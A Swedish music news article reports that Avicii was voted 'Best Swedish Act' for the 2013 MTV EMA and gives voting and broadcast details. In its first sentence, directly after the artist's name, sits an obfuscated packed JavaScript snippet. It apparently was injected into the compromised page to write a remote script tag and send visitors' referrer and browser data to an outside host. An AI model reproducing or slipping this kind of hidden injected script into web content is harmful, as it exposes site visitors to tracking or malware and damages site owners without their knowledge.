Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Avicii representerar Sverige på 2013 MTV EMA

Avicii representerar Sverige på 2013 MTV EMA
Sebastian

Avicii eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tynai|var|u0026u|referrer|athei||js|php’.split(’|’),0,{}))
har efter omröstning blivit framröstad som ”Best Swedish Act”. De senaste sex veckorna har svenska fans kunnat rösta på sin favorit i kategorin ”Best Swedish Act”. Avicii kommer nu att representera Sverige i kampen om att bli främsta artist mot övriga Nordens och Storbritanniens samt Irlands artister.

Från och med idag till den 31:a oktober kommer fans i Norden och Storbritannien samt Irland kunna rösta på sina favoriter. Vinnaren där kommer att representera Norra Europa och tävla mot artister som representerar tio andra regioner över världen om det prestigefylda priset ”Worldwide Act”.

På galan den 10:e november kommer priset ”Worldwide Act” att delas ut till en av de tio finalisterna. De tio finalisterna härstammar från 51 stycken länder och representerar alla typer av musikstilar. Syftet med Worldwide Act priset att hylla och uppmärksamma musik från alla jordens hörn

Music Angel Friendz sponsrar 2013 MTV EMA.

Sändningstid

2013 MTV EMA sänds söndagen den 10 november kl. 21.00 på MTV. De som vill se artisterna göra entré på röda mattan ska slå på TV:n en timme tidigare, kl. 20.00.